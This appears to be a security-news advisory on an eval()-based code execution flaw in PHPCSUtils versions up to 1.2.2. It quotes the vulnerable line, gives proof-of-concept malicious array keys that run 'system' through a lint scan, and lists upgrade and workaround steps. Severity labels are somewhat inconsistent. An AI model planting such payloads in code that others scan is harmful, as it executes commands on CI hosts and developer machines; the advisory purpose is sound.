Listen to this Post
PHPCSUtils versions 1.0.0-alpha1 through 1.2.2 contain an arbitrary code execution vulnerability in the `PHPCSUtils\AbstractSniffs\AbstractArrayDeclarationSniff::getActualArrayKey()` method. The vulnerable method is reachable by any sniff that extends `AbstractArrayDeclarationSniff` and calls getActualArrayKey(). Running PHPCS over untrusted PHP code through such a sniff, for example, in a CI pipeline that lints pull requests, or on a developer machine reviewing third-party code, could lead to arbitrary command execution on the scanning host. The vulnerability occurs when the method determines the value of an array key using eval(). The source code of the key expression from the file under analysis is passed directly to `eval()` as shown in the vulnerable code path: $key = eval('return ' . $content . ';' . \PHP_EOL);. Here `$content` is text from the file being analysed. A maliciously crafted array key such as `’system'(‘id’)` would therefore not be evaluated, but executed when the code was scanned. Known code paths that reach the vulnerable method include the PHPCSExtra sniffs `Universal.Arrays.DuplicateArrayKey` and Universal.Arrays.MixedArrayKeyTypes. Other packages that call `AbstractArrayDeclarationSniff::getActualArrayKey()` may also be vulnerable. This issue has been fixed in PHPCSUtils 1.2.3. The vulnerability was assigned CVE-2026-65954 and GHSA-r6hr-vr92-vv28, rated high with a CVSS score of 8.6.
DailyCVE Form:
Platform: PHPCSUtils
Version: 1.0.0-alpha1-1.2.2
Vulnerability: Arbitrary Code Execution
Severity: Critical (CVSS 8.6)
date: 2026-07-27
Prediction: Patch released 2026-07-27
What Undercode Say
Analytics
Check installed PHPCSUtils version composer show phpcsstandards/phpcsutils Run PHPCS with sniffs to verify vulnerability phpcs --standard=Universal /path/to/code List all sniffs in a standard with -e flag phpcs -e --standard=/path/to/ruleset.xml
// Vulnerable code path in AbstractArrayDeclarationSniff.php
$key = eval('return ' . $content . ';' . \PHP_EOL);
How Exploit: (Educational Purposes!)
// Malicious array key crafted for execution during PHPCS scan
$array = [
'system'('id') => 'value'
];
// Alternative payload using assert
$array = [
assert('system("id")') => 'value'
];
CI pipeline scenario - linting a malicious PR phpcs --standard=Universal malicious-code.php Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Protection: from this CVE
Upgrade to PHPCSUtils 1.2.3 or later composer require phpcsstandards/phpcsutils:^1.2.3
<!-- Workaround: disable vulnerable sniffs in custom ruleset --> <rule ref="Universal"> <exclude name="Universal.Arrays.DuplicateArrayKey"/> <exclude name="Universal.Arrays.MixedArrayKeyTypes"/> </rule>
Verify sniffs are disabled phpcs -e --standard=/path/to/ruleset.xml
Impact
Arbitrary command execution on the scanning host when PHPCS processes untrusted PHP code through vulnerable sniffs. Affects CI pipelines that lint pull requests and developer machines reviewing third-party code.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

